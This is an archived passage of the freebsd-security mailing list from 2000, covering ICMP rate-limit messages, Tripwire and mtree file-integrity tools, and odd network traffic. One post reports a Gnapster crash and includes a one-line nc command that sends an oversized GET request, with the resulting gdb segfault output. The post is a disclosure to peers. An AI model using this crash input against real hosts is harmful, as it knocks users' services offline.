ESMTP id A64E237BE54 for ; Wed, 31 May 2000 10:45:12 -0700 (PDT) (envelope-from visigoth@telemere.net) Received: by shell.telemere.net (Postfix, from userid 1001) id 392AC70601; Wed, 31 May 2000 12:45:03 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by shell.telemere.net (Postfix) with ESMTP id 34BED6C801; Wed, 31 May 2000 12:45:03 -0500 (CDT) Date: Wed, 31 May 2000 12:44:58 -0500 (CDT) From: Visigoth To: Mitch Collinsworth Cc: freebsd-security@freebsd.org, mkc@larryboy.graphics.cornell.edu Subject: Re: icmp-response bandwidth limit In-Reply-To: <200005311729.NAA17118@larryboy.graphics.cornell.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This type of kernel message generally denotes one of two things, neither of which are usually nice. icmp-response bandwidth limiting is built into the kernel to lessen the effects of a ping flood, and are often the result of being flooded, but I have also noticed that message due to scans such as nmap. Either way, something happened that you will probably want to know about... I might recomend installing ipfilter and logging all traffic except your known/public services (and maybe even some of those ;). Visigoth Damieon Stark Sr. Unix Systems Administrator visigoth@telemere.net PGP Public Key: www.telemere.net/~visigoth/visigoth.asc ____________________________________________________________________________ | M$ -Where do you want to go today? | Linux -Where do you want to go tomorrow?| FreeBSD - The POWER to serve Freebsd -Are you guys comming or what? | http://www.freebsd.org | | - ---------------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBOTVBjznmC/+RTnGeEQK/ZgCaA49njCV3Mn0QmzzjViG7s9PUygUAoM6Y jXN3p6dfTQJ4ieOpCN2YwB1i =xWXK -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 10:55:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from noc.hscil.net (noc.hscil.net [209.100.81.135]) by hub.freebsd.org (Postfix) with ESMTP id DC95F37B8DF for ; Wed, 31 May 2000 10:55:25 -0700 (PDT) (envelope-from jramirez@xlinet.net) Received: from noc05 (noc05.hscil.net [200.8.8.124]) by noc.hscil.net (8.9.3/8.9.3) with SMTP id MAA29136; Wed, 31 May 2000 12:51:52 -0500 (CDT) (envelope-from jramirez@xlinet.net) Message-Id: <3.0.6.32.20000531130546.0094c160@200.8.8.2> X-Sender: jramirez@200.8.8.2 X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Wed, 31 May 2000 13:05:46 -0500 To: Visigoth , Mitch Collinsworth From: "Jeremy L. Ramirez" Subject: Re: icmp-response bandwidth limit Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <200005311729.NAA17118@larryboy.graphics.cornell.edu> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can also come from well known bandwidth measurement tools (bing, et al). I have seen this happen a few times. If not you then someone is probably snooping around looking for information, as Damieon said, not very nice. Good luck, Jeremy Ramirez jramirez@xlinet.net At 12:44 PM 5/31/2000 -0500, Visigoth wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > > > > This type of kernel message generally denotes one of two things, >neither of which are usually nice. icmp-response bandwidth limiting is >built into the kernel to lessen the effects of a ping flood, and are often >the result of being flooded, but I have also noticed that message due to >scans such as nmap. Either way, something happened that you will probably >want to know about... I might recomend installing ipfilter and logging >all traffic except your known/public services (and maybe even some of >those ;). > >Visigoth > > > >Damieon Stark >Sr. Unix Systems Administrator >visigoth@telemere.net > >PGP Public Key: www.telemere.net/~visigoth/visigoth.asc > >____________________________________________________________________________ > | >M$ -Where do you want to go today? | >Linux -Where do you want to go tomorrow?| FreeBSD - The POWER to serve >Freebsd -Are you guys comming or what? | http://www.freebsd.org > | > | >- ---------------------------------------------------------------------------- > >-----BEGIN PGP SIGNATURE----- >Version: PGPfreeware 5.0i for non-commercial use >Charset: noconv > >iQA/AwUBOTVBjznmC/+RTnGeEQK/ZgCaA49njCV3Mn0QmzzjViG7s9PUygUAoM6Y >jXN3p6dfTQJ4ieOpCN2YwB1i >=xWXK >-----END PGP SIGNATURE----- > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 10:56:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from larryboy.graphics.cornell.edu (larryboy.graphics.cornell.edu [128.84.247.48]) by hub.freebsd.org (Postfix) with ESMTP id 1546A37B8DF for ; Wed, 31 May 2000 10:56:39 -0700 (PDT) (envelope-from mkc@larryboy.graphics.cornell.edu) Received: from larryboy.graphics.cornell.edu (mkc@localhost) by larryboy.graphics.cornell.edu (8.9.3/8.9.3) with ESMTP id NAA17404; Wed, 31 May 2000 13:56:34 -0400 (EDT) (envelope-from mkc@larryboy.graphics.cornell.edu) Message-Id: <200005311756.NAA17404@larryboy.graphics.cornell.edu> To: Visigoth Cc: freebsd-security@freebsd.org Subject: Re: icmp-response bandwidth limit In-Reply-To: Message from Visigoth of "Wed, 31 May 2000 12:44:58 CDT." Date: Wed, 31 May 2000 13:56:34 -0400 From: Mitch Collinsworth Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > This type of kernel message generally denotes one of two things, >neither of which are usually nice. icmp-response bandwidth limiting is >built into the kernel to lessen the effects of a ping flood, and are often >the result of being flooded, but I have also noticed that message due to >scans such as nmap. Either way, something happened that you will probably >want to know about... I might recomend installing ipfilter and logging >all traffic except your known/public services (and maybe even some of >those ;). Ok, thanks for the info. I failed to mention a couple of possibly relevent items: - This machine is running 3.4-R - There are several other FreeBSD machines on the same net, none of which logged this message, including 2 that are 4.0-R. -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 12: 5:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 3BBB837BE9E for ; Wed, 31 May 2000 12:05:32 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 47391 invoked by uid 1000); 31 May 2000 19:05:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 May 2000 19:05:30 -0000 Date: Wed, 31 May 2000 14:05:30 -0500 (CDT) From: Mike Silbersack To: Visigoth Cc: Mitch Collinsworth , freebsd-security@freebsd.org, mkc@larryboy.graphics.cornell.edu Subject: Re: icmp-response bandwidth limit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 May 2000, Visigoth wrote: > neither of which are usually nice. icmp-response bandwidth limiting is > built into the kernel to lessen the effects of a ping flood, and are often Actually, it doesn't rate limit icmp echos (yet). It rate limits RST packets and icmp port unreachables. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 12:59:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from blueriver.net (moseisley.blueriver.net [206.246.154.244]) by hub.freebsd.org (Postfix) with ESMTP id 86A5037B5FD for ; Wed, 31 May 2000 12:59:36 -0700 (PDT) (envelope-from jlgaddis@blueriver.net) Received: from freebsd.home.lan (pm3-orl-02-11.blueriver.net [209.43.67.75]) by blueriver.net (8.9.3/8.9.3) with ESMTP id PAA27417; Wed, 31 May 2000 15:05:59 -0500 Received: from freebsd.home.lan (freebsd.home.lan [192.168.1.1]) by freebsd.home.lan (8.9.3/8.9.3) with ESMTP id PAA11092; Wed, 31 May 2000 15:01:11 -0500 (EST) Date: Wed, 31 May 2000 15:01:11 -0500 (EST) From: Jeremy Gaddis To: Mitch Collinsworth Cc: Visigoth , freebsd-security@FreeBSD.ORG Subject: Re: icmp-response bandwidth limit In-Reply-To: <200005311756.NAA17404@larryboy.graphics.cornell.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 May 2000, Mitch Collinsworth wrote: > Ok, thanks for the info. I failed to mention a couple of possibly > relevent items: > > - This machine is running 3.4-R > - There are several other FreeBSD machines on the same net, none of > which logged this message, including 2 that are 4.0-R. I get this when doing an nmap scan from across my network. Running 4.0-RELEASE. -- Jeremy L. Gaddis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 19:15:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from raq.tabernae.com (raq.gashalot.com [208.197.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 1D70337B9CE for ; Wed, 31 May 2000 19:15:13 -0700 (PDT) (envelope-from gashalot@gashalot.com) Received: from localhost (gashalot@localhost [127.0.0.1]) by raq.tabernae.com (8.9.3/8.8.8) with ESMTP id WAA32735 for ; Wed, 31 May 2000 22:15:11 -0400 Date: Wed, 31 May 2000 22:15:08 -0400 (EDT) From: Robert Gash X-Sender: gashalot@raq.tabernae.com To: freebsd-security@freebsd.org Subject: Recommendations for alternative tripwire options Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After reading the recent articles about the crack attempts on the community LAN I am going to go ahead and deal with the hassle of installing system file watching programs (like tripwire, etc.). However, as we are a commercial orginization, the new copies of tripwire are not free for us, and I'd like to use something in the GPL (as GPL software often works better than commercial products). I've looked around and found AIDE, which appears to be a tripwire replacement written under the GNU GPL. I have only found one mention of this on the freebsd-security list in the geocrawler archives, so I'll ask. Has anyone found any decent systems like tripwire available under the GNU GPL? I like to keep my systems pretty tight (nothing but trusted daemons [FTP, Apache, openssh] running on the machines, and we don't allow any users to log in, period.), but security from the inside can never hurt (espically with a growing staff on the inside). If you know of some software like tripwire available under the GPL (or freely available to commercial orginizations), I'd love to hear from you (and perhaps some others on the list as well). I've had no success in getting AIDE to compile on my 3.4-S box over here, I'll include the compile errors below. Thanks for any insight into this matter you may be able to provide. -Robert Gash AIDE 0.7 Compile Errors: ----------------------------------------------------- gcc -DHAVE_CONFIG_H -I. -I/root/aide/aide-0.7/src -I.. -I/usr/local/include -I/root/aide/aide-0.7/include -I/root/aide/aide-0.7 -I/root/aide/aide-0.7/src -g -O2 -c db_file.c db_file.c: In function `db_readline_file': db_file.c:215: warning: dereferencing `void *' pointer db_file.c:215: request for member `_file' in something not a structure or union gmake[3]: *** [db_file.o] Error 1 ----------------------------------------------------- -- .----------------- PGP Key: `finger gashalot@gashalot.com` -----------------. | Robert Gash | Work - gashalot@fasturl.net | | Senior Systems Administrator | Personal - gashalot@gashalot.com | | VenerNet Inc -- www.fasturl.net | http://www.gashalot.com | `---- PGP Key Fprint: 78 5D 64 D2 99 F3 D8 A0 B2 56 DF EF F2 C6 D3 DF ----' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 19:50:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 9642437BA0D for ; Wed, 31 May 2000 19:50:48 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id TAA28748; Wed, 31 May 2000 19:50:11 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28742; Wed May 31 19:49:51 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id TAA03521; Wed, 31 May 2000 19:49:51 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdnR3519; Wed May 31 19:49:16 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e512nGk04745; Wed, 31 May 2000 19:49:16 -0700 (PDT) Message-Id: <200006010249.e512nGk04745@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdSA4741; Wed May 31 19:49:15 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Robert Gash Cc: freebsd-security@FreeBSD.ORG Subject: Re: Recommendations for alternative tripwire options In-reply-to: Your message of "Wed, 31 May 2000 22:15:08 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 31 May 2000 19:49:15 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Robert Gash writes: > After reading the recent articles about the crack attempts on the > community LAN I am going to go ahead and deal with the hassle of > installing system file watching programs (like tripwire, etc.). However, > as we are a commercial orginization, the new copies of tripwire are not > free for us, and I'd like to use something in the GPL (as GPL software > often works better than commercial products). I've looked around and > found AIDE, which appears to be a tripwire replacement written under the > GNU GPL. I have only found one mention of this on the freebsd-security > list in the geocrawler archives, so I'll ask. > > Has anyone found any decent systems like tripwire available under the GNU > GPL? I like to keep my systems pretty tight (nothing but trusted daemons > [FTP, Apache, openssh] running on the machines, and we don't allow any > users to log in, period.), but security from the inside can never hurt > (espically with a growing staff on the inside). If you know of some > software like tripwire available under the GPL (or freely available to > commercial orginizations), I'd love to hear from you (and perhaps some > others on the list as well). I've had no success in getting AIDE to > compile on my 3.4-S box over here, I'll include the compile errors below. I've managed to build, install, and test aide on FreeBSD and I happen to like Tripwwire better. You can get 1.3 or 1.3.1 from tripwiresecurity.com. As they don't have a FreeBSD product I've been told by a Tripwiresecurity salesman that FreeBSD users can use 1.3.1 without restriction. Reading the copyright I don't see any restriction. I do have a locally developed port for 1.3.1. If anyone wants it I could submit a PR to have it replace Tripwire 1.2 or added in addition to 1.2 to the ports collection. Tripwiresecurity is talking about releasing Tripwire 2.x to open source, however you'd still have to purchase the Tripwire console. They're not exactly sure when. On the other hand I did submit a PR with an aide 0.6 port. I'm not sure what happened to it, probably still in gnats somewhere. It would be trivial to update the port for 0.7. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 22:51:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from ares.trc.adelaide.edu.au (ares.trc.adelaide.edu.au [129.127.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 4F9AF37B93A for ; Wed, 31 May 2000 22:51:10 -0700 (PDT) (envelope-from glewis@ares.trc.adelaide.edu.au) Received: (from glewis@localhost) by ares.trc.adelaide.edu.au (8.9.3/8.9.3) id PAA24639; Thu, 1 Jun 2000 15:21:00 +0930 (CST) (envelope-from glewis) From: Greg Lewis Message-Id: <200006010551.PAA24639@ares.trc.adelaide.edu.au> Subject: Re: Recommendations for alternative tripwire options In-Reply-To: from Robert Gash at "May 31, 2000 10:15:08 pm" To: Robert Gash Date: Thu, 1 Jun 2000 15:21:00 +0930 (CST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL70 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Gash wrote: > AIDE 0.7 Compile Errors: > ----------------------------------------------------- > gcc -DHAVE_CONFIG_H -I. -I/root/aide/aide-0.7/src > -I.. -I/usr/local/include -I/root/aide/aide-0.7/include > -I/root/aide/aide-0.7 -I/root/aide/aide-0.7/src -g -O2 -c db_file.c > db_file.c: In function `db_readline_file': > db_file.c:215: warning: dereferencing `void *' pointer > db_file.c:215: request for member `_file' in something not a structure or > union > gmake[3]: *** [db_file.o] Error 1 > ----------------------------------------------------- Edit src/db_file.c and change line 215 to be: conf->db_gzin=gzdopen(fileno((FILE *) (conf->db_in)),"rb"); and you should find that things compile. I've had problems with the compressed database support in aide-0.7, but uncompressed databases work as normal. In terms of alternatives, the recent commits regarding mtree(8) are supposed to make it useable as a tripwire alternative, but I've no direct experience with using it as such and I can't quite recall if the changes made it back into 4.0-STABLE yet (I think so). There was an article on Daemon News about using mtree to perform tripwire like functions a couple of issues ago I think. HTH. -- Greg Lewis glewis@trc.adelaide.edu.au Computing Officer +61 8 8303 5083 Teletraffic Research Centre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 31 23: 2:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 3341D37BEA5 for ; Wed, 31 May 2000 23:02:47 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id XAA31882; Wed, 31 May 2000 23:01:57 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Wed, 31 May 2000 23:01:57 -0700 (PDT) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Cy Schubert - ITSD Open Systems Group Cc: Robert Gash , freebsd-security@FreeBSD.ORG Subject: Re: Recommendations for alternative tripwire options In-Reply-To: <200006010249.e512nGk04745@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy, A PR for the addition of tripwire 1.3.1 would be great! (In the mean time would you mind sharing your port? ;^) Thanks soo much... - Todd On Wed, 31 May 2000, Cy Schubert - ITSD Open Systems Group wrote: > In message , > Robert > Gash writes: > > After reading the recent articles about the crack attempts on the > > community LAN I am going to go ahead and deal with the hassle of > > installing system file watching programs (like tripwire, etc.). However, > > as we are a commercial orginization, the new copies of tripwire are not > > free for us, and I'd like to use something in the GPL (as GPL software > > often works better than commercial products). I've looked around and > > found AIDE, which appears to be a tripwire replacement written under the > > GNU GPL. I have only found one mention of this on the freebsd-security > > list in the geocrawler archives, so I'll ask. > > > > Has anyone found any decent systems like tripwire available under the GNU > > GPL? I like to keep my systems pretty tight (nothing but trusted daemons > > [FTP, Apache, openssh] running on the machines, and we don't allow any > > users to log in, period.), but security from the inside can never hurt > > (espically with a growing staff on the inside). If you know of some > > software like tripwire available under the GPL (or freely available to > > commercial orginizations), I'd love to hear from you (and perhaps some > > others on the list as well). I've had no success in getting AIDE to > > compile on my 3.4-S box over here, I'll include the compile errors below. > > I've managed to build, install, and test aide on FreeBSD and I happen > to like Tripwwire better. You can get 1.3 or 1.3.1 from > tripwiresecurity.com. As they don't have a FreeBSD product I've been > told by a Tripwiresecurity salesman that FreeBSD users can use 1.3.1 > without restriction. Reading the copyright I don't see any > restriction. I do have a locally developed port for 1.3.1. If anyone > wants it I could submit a PR to have it replace Tripwire 1.2 or added > in addition to 1.2 to the ports collection. > > Tripwiresecurity is talking about releasing Tripwire 2.x to open > source, however you'd still have to purchase the Tripwire console. > They're not exactly sure when. > > On the other hand I did submit a PR with an aide 0.6 port. I'm not > sure what happened to it, probably still in gnats somewhere. It would > be trivial to update the port for 0.7. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 8:42:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 02CE237BDCB for ; Thu, 1 Jun 2000 08:42:08 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA37965; Thu, 1 Jun 2000 11:41:58 -0400 (EDT) (envelope-from wollman) Date: Thu, 1 Jun 2000 11:41:58 -0400 (EDT) From: Garrett Wollman Message-Id: <200006011541.LAA37965@khavrinen.lcs.mit.edu> To: Robert Gash Cc: freebsd-security@FreeBSD.ORG Subject: Recommendations for alternative tripwire options In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Has anyone found any decent systems like tripwire available under the GNU > GPL? You are asking this on a FreeBSD mailing-list? In any event, try (in 5-current and 4-stable): # mtree -ciK md5digest,sha1digest,ripemd160digest -p / \ > >my.file.list To check, use: # mtree -p / my.file.list You will probably find a significant number of files which are expected to change; you'll want to list these in a separate file and regenerate the list using the `-X' option. (You'll then also want to check the list using the same option.) At some point, I'll try to come up with a list which could serve as a starting point. Here is an example of what the specification file looks like: # user: wollman # machine: khavrinen.lcs.mit.edu # tree: / # date: Thu Jun 1 11:36:55 2000 # . /set type=file uid=0 gid=0 mode=0755 nlink=1 . type=dir nlink=24 size=1024 time=958576737.0 .cshrc mode=0644 nlink=2 size=653 time=958576718.0 \ md5digest=7f38e672eedf928898b502e591f00c50 \ sha1digest=a2bf06ffb1c8478fdf898e6b748c4f48f2fa8b72 \ ripemd160digest=24e07e45d56f8b7eafdc48e7063f21ac2aa4de62 .profile mode=0644 nlink=2 size=251 time=948741779.0 \ md5digest=5cda7079d26225afa62d327ed5675cc5 \ sha1digest=efb1d360dc4643341466976cfaa009324a7f713b \ ripemd160digest=7449907dda3d6ed151c1aa5ebe697ff3ace61454 [...] kernel mode=0555 size=2397703 time=958575176.0 \ md5digest=386cabf8174df13f02c447f0481723dc \ sha1digest=6e599333455b1bd469a23ac1ea0aa7675d4cb0b2 \ ripemd160digest=885928f0e37675bbe2bf1277b06ca743576265d4 \ flags=schg [rest of the specification deleted] -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 9:55:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from pazardjik.digsys.bg (pazardjik.digsys.bg [193.68.12.65]) by hub.freebsd.org (Postfix) with ESMTP id 0E39337BF1A for ; Thu, 1 Jun 2000 09:55:48 -0700 (PDT) (envelope-from mirobo@mbox.digsys.bg) Received: from shadow (pazardjik74.pip.digsys.bg [193.68.12.74]) by pazardjik.digsys.bg (8.8.5/8.8.5) with SMTP id TAA23366 for ; Thu, 1 Jun 2000 19:55:42 +0300 (EEST) Message-ID: <004001bfcbea$2253b440$5a01a8c0@TK> From: "mirobo" To: Subject: 123 Date: Thu, 1 Jun 2000 19:55:02 +0300 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 9b558f94 subscribe freebsd-security mirobo@mbox.digsys.bg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 18:23:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from server.computeralt.com (server.computeralt.com [207.41.29.10]) by hub.freebsd.org (Postfix) with ESMTP id 0058C37B9A7 for ; Thu, 1 Jun 2000 18:23:33 -0700 (PDT) (envelope-from scott@computeralt.com) Received: from scott.computeralt.com (scott.computeralt.com [207.41.29.100]) by server.computeralt.com (8.9.3/8.9.1) with ESMTP id VAA28303 for ; Thu, 1 Jun 2000 21:23:24 -0400 (EDT) Message-Id: <4.3.1.2.20000601211401.0248cd90@mail.computeralt.com> X-Sender: scott@mail.computeralt.com X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Thu, 01 Jun 2000 21:23:22 -0400 To: freebsd-security@freebsd.org From: "Scott I. Remick" Subject: Ports 1077 and 50419? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just watched a crapload of traffic occur between a dialup user and our FreeBSD box. Traffic was TCP between the dialup's port 1077 and the FreeBSD box's port 50419. Most of the traffic was from the FreeBSD box to the client and it pretty much flooded the connection. Eventually it stopped. I did some looking around and couldn't find anything that would use those ports. The closest was the fake "bosniffer" which is really BO in disguise, but from reading the way it works, this wasn't it . I was about to blindly block those ports for lack of any other solution, but then the traffic stopped. So I'll check with you guys first. Any thoughts? ----------------------- Scott I. Remick scott@computeralt.com Network and Information (802)388-7545 ext. 236 Systems Manager FAX:(802)388-3697 Computer Alternatives, Inc. http://www.computeralt.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 18:35:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from reddog.yi.org (ls-tc01-24.nothinbut.net [207.44.35.38]) by hub.freebsd.org (Postfix) with ESMTP id D095637BAD9 for ; Thu, 1 Jun 2000 18:34:59 -0700 (PDT) (envelope-from ai32@drexel.edu) Received: from reddog.yi.org (localhost [127.0.0.1]) by reddog.yi.org (Postfix) with SMTP id A3BF04DB for ; Thu, 1 Jun 2000 21:35:51 -0500 (EST) From: specter To: freebsd-security@freebsd.org Subject: gnapster dos(?) Date: Thu, 1 Jun 2000 21:33:54 -0500 X-Mailer: Unknown Abusive Thing Content-Type: text/plain MIME-Version: 1.0 Message-Id: <00060121355101.00534@reddog.yi.org> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Can anyone else verify this :- Gnapster Version : 1.3.9 & 1.3.10 Host: FreeBSD 4.0-Release, x86 >>>>>> first we do (gdb) run Starting program: /usr/local/bin/gnapster >>>>>> meanwhile .... yes "GET AAAAAAAAA...MANY As....." | nc >>>>>> result.... Program received signal SIGSEGV, Segmentation fault. 0x8057978 in network_handle_header_complete (data=0x80e7000, source=7, condition=GDK_INPUT_READ) at network.c:487 487 network.c: No such file or directory. (gdb) kill I contacted the author about a week or two ago, received no response. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 18:46:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.svzserv.kemerovo.su (www.svzserv.kemerovo.su [213.184.65.80]) by hub.freebsd.org (Postfix) with ESMTP id 0D73837BAD9 for ; Thu, 1 Jun 2000 18:46:25 -0700 (PDT) (envelope-from eugen@svzserv.kemerovo.su) Received: from svzserv.kemerovo.su (kost.svzserv.kemerovo.su [213.184.65.82]) by www.svzserv.kemerovo.su (8.9.3/8.9.3) with ESMTP id JAA32391 for ; Fri, 2 Jun 2000 09:46:22 +0800 (KRAST) (envelope-from eugen@svzserv.kemerovo.su) Message-ID: <39371224.99DCCEBF@svzserv.kemerovo.su> Date: Fri, 02 Jun 2000 09:47:16 +0800 From: Eugene Grosbein Organization: SVZServ X-Mailer: Mozilla 4.7 [en] (Win95; I) X-Accept-Language: ru,en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: No strategy for buffer Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! I post this here because the my problem marked in daily "security check output". After receiving "FreeBSD Security Advisory: FreeBSD-SA-00:19.semconfig" I cvsup'ed my 3.4-STABLE upto last 3-STABLE, rebuilt and reinstalled world and kernel, without problems. 2 days all was fine. But I received in "security check output" this morning: > No strategy for buffer at 0xc200fef8 > : 0xc5c6ad40: type VREG, usecount 4, writecount 0, refcount 0, flags (VOBJBUF) > tag VT_PROCFS, type 12, pid 13862, mode 124, flags 0 > : 0xc5c6ad40: type VREG, usecount 4, writecount 0, refcount 0, flags (VOBJBUF) > tag VT_PROCFS, type 12, pid 13862, mode 124, flags 0 > vnode_pager_getpages: I/O read error > vm_fault: pager read error, pid 20442 (mc) > pid 20442 (mc), uid 0: exited on signal 11 > pid 20462 (cvsupd), uid 2029: exited on signal 10 (core dumped) This computer is not overclocked. This is Celeron 366/64M RAM/256M SWAP. One more, one day before cvsupd died on signal 4. This box was running for 4 months without a problem. Sometimes I upgrade it to latest 3-STABLE. Is it a security or hardware problem and how do I resolve this? Eugene Grosbeign To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 1 23:25:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from md.uniyar.ac.ru (md.uniyar.ac.ru [193.233.49.90]) by hub.freebsd.org (Postfix) with ESMTP id E284537BA6C for ; 